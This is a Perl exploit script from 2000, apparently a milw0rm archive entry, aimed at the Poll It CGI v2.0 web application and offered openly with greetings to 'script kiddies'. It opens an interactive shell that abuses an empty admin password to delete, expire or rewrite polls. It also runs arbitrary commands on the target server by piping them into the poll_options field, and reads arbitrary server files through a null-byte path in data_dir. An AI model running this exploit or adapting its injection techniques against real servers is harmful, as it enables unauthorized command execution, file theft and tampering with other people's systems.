#!/usr/bin/perl ###################################### # # # # # Poll It CGI v2.0 exploit # # keelis/havoc korp 2000 # # # # shouts to modjo, p, zen, kd, # # ab, all the script kiddies. # # # # # # keelis(at)hushmail(dot)com # # # # # ###################################### use Socket; ($host, $cgi_loc) = @ARGV[0,1]; $ip=inet_aton($host); print("\n\t+--- Poll It CGI v2.0 exploit ---+"); print("\n\t+--- keelis/havoc korp 2000 ---+\n\n\n"); usage() if (!defined($host) || !defined($cgi_loc)); while(true) { print "[poll\@$host] "; $stdin = \*STDIN; $cmdin = <$stdin>; chomp($cmdin); ($cmd, $param) = split(/ /, $cmdin, 2); if ($cmd eq "d") { $request = "?load=admin&admin_password=&action=delete_poll"; $success_msg = "current poll has been deleted\n\n"; make_request(); } if ($cmd eq "e") { $request = "?load=admin&admin_password=&action=expire_poll"; $success_msg = "current poll has been expired\n\n"; make_request(); } if ($cmd eq "c") { if (!defined($param)) { print "you need to specify a voting topic for the new poll\n\n"; next; } $request = "?load=admin&admin_password=&action=create_new&new_pollaction=1&show_after=1&new_title=$param"; $success_msg = "created new poll with voting topic: \"$param\"\n\n"; make_request(); } if ($cmd eq "a") { if (!defined($param)) { print "you need to specify the text for the new voting option\n\n"; next; } $request = "?load=admin&admin_password=&action=add_option&add_option=$param"; $success_msg = "voting option added to current poll: \"$param\"\n\n"; make_request(); } if ($cmd eq "g") { if (!defined($param)) { print "you need to specify the command to be run\n\n"; next; } $request = "?load=admin&admin_password=&action=add_option&add_option=none&poll_options=$param%7C"; $success_msg = "command has been run on remote server: \"$param\"\n\n"; make_request(); } if ($cmd eq "r") { if (!defined($param)) { print "you need to specify the file to be read\n\n"; next; } $request = "?load=admin&data_dir=$param%00"; $success_msg = "contents of \"$param\" follow:\n\n"; make_request(); } if ($cmd eq "?" || $cmd eq "h" || $cmd eq "help") { print "\n? \t\tshow this help screen\n"; print "d \t\tdelete current poll\n"; print "e \t\texpire current poll\n"; print "c \tcreate new poll using as topic\n"; print "a \tadd to voting options\n"; print "r \tread the file in remote server\n"; print "g \trun in the remote server\n"; print "x \t\texit pollex.pl shell\n\n"; next; } if ($cmd eq "x") { print "\n"; last; } print "command not found. use \"?\" for help screen.\n\n"; } sub make_request { $request=~s/ /+/g; $request=~s/\\/%5C/g; $request=~s/\//%2F/g; my @req=sendraw("GET $cgi_loc$request HTTP/1.1\r\nHost: $host\r\n\r\n"); $reqanswer=join('', @req); ($httpv, $httpcode) = split(/ /, $reqanswer); $httpcode = substr($httpcode, 0, 3); if ($httpcode eq "200") { print $success_msg if ($cmd ne "r"); } else { if ($httpcode ne "404") { print "httpd returned an error code:\n\n"; print $reqanswer,"\n"; } else { die "unexpected httpd error code 404. aborting...\n\n" } } if ($cmd eq "r") { $reqanswer=substr($reqanswer, index($reqanswer, "\r\n\r\n")+4); if (substr($reqanswer, 6, 15) eq "Template : File") { print "file \"$param\" not found or non-readable from cgi\n\n"; } else { print $success_msg; print $reqanswer,"\n"; } } next; } sub usage { print "Usage: pollex.pl \n\n"; print "\thost :\thost/ip where CGI resides\n"; print "\tcgi_loc:\tpath to the CGI (non-SSI version needed)\n\n"; exit(0); } sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("socket problems... aborting.\n"); if(connect(S,pack "SnA4x8",2,80,$ip)){ select(S); $|=1; print $pstr; my @in=; select(STDOUT); close(S); return @in; } else { die("can\'t connect... aborting.\n"); } } # milw0rm.com [2000-11-15]